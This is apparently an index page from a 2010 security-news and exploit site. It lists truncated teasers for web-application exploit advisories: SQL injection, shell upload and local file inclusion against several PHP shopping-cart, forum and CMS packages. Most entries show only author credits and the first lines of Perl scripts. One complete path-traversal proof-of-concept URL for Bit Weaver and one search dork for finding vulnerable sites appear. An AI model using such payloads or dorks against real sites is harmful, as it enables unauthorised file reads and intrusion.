Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for July 2nd, 2010

Oxygen2PHP <= 1.1.3 (member.php) Blind SQL Injection Exploit

#!/usr/bin/perl
#[0-Day] Oxygen2PHP <= 1.1.3 (member.php) Remote SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use LWP::UserAgent;
use HTTP::Cookies;
use strict;
my $UserName = [...]


Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit

#!/usr/bin/perl
#[0-Day] Oxygen2PHP <= 1.1.3 (forumdisplay.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]


ShopCartDx <= v4.30 (products.php) Blind SQL Injection Exploit

#!/usr/bin/perl
#[0-Day] ShopCartDx <= v4.30 (products.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]


ShopCartDx <= v4.30 (product_detail.php) Blind SQL Injection Exploit

#!/usr/bin/perl
#[0-Day] ShopCartDx <= v4.30 (product_detail.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]


Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit

#!/usr/bin/perl
#[0-Day] Oxygen2PHP <= 1.1.3 (post.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]


ES Simple Uploader v 1.1 => upload shell Vulnerability

##########################################
#[+] Date: 30/06/2010
#[+] Author: MeGo
#[+] Tested ON :windows xP
#[+] MY Team : Team Hacker Egypt
#[+] Email: M3GO@live.com
#[+] CategorY : Webapps/0day [...]


iScripts ReserveLogic 1.0 SQL Injection Vulnerability

Name iScripts ReserveLogic
Vendor [...]


MusicBox <= v3.3 (install.php) Change Password Vulnerability

[~] Author : Mr.ThieF
[~] Software Link : www.musicboxv2.com
[~] Version : v3.3
[~] Contact : Sj-@hotmail.com <~
[~] DorK : genre_artists.php?id=13
[~] CVE :
[~] Code :
[~] How To Exploit [...]


iScripts EasySnaps 2.0 Multiple SQL Injection Vulnerabilities

Name iScripts EasySnaps
Vendor [...]


iScripts CyberMatch 1.0 Blind SQL Injection Vulnerability

Name iScripts CyberMatch
Vendor [...]


Bit Weaver v2.7 Local File Inclusion Vulnerability

------------------------------------------------------------------------
Software................Bit Weaver 2.7
Vulnerability...........Local File Inclusion
Download................http://www.bitweaver.org/
Release Date............7/1/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
--Description--
A local file inclusion vulnerability in Bit Weaver 2.7 can be
exploited to include arbitrary files.
--PoC--
http://server/wiki/rankings.php?style=../../../../../../../../windows/system.ini%00
# [...]


Iphone Pointter Social Network LFI Vulnerability



Pointter Social Network LFI Vulnerability



Infotel (pagina.php) SQL Injection Vulnerability



Grandora Rialto CMS SQLi|XSS|HTML|URL Redirecting Vulnerability



Joomla Component com_seyret Blind SQL Injection Vulnerability

[+]Title :Joomla Component (com_seyret) Blind SQL Injection Exploit
[+]Author [...]


MooreAdvice (productlist.asp) SQL Injection Vulnerability



Consulweb (index.php) Blind SQL Injection Vulnerability



MyImages Image file manager => upload shell

##########################################
#[+] Date: 02/07/2010
#[+] Author: MeGo
#[+] Tested ON :windows xP
#[+] MY Team : Team Hacker Egypt
#[+] CategorY : Webapps/0day TYPE: PHP
#[+] Email: M3GO@live.com
##########################################
[ [...]


DXL dev Image Hosting => upload shell

##########################################
#[+] Date: 02/07/2010
#[+] Author: MeGo
#[+] Tested ON :windows xP
#[+] MY Team : Team Hacker Egypt
#[+] CategorY : Webapps/0day TYPE: PHP
#[+] Email: M3GO@live.com
##########################################
[+] [...]
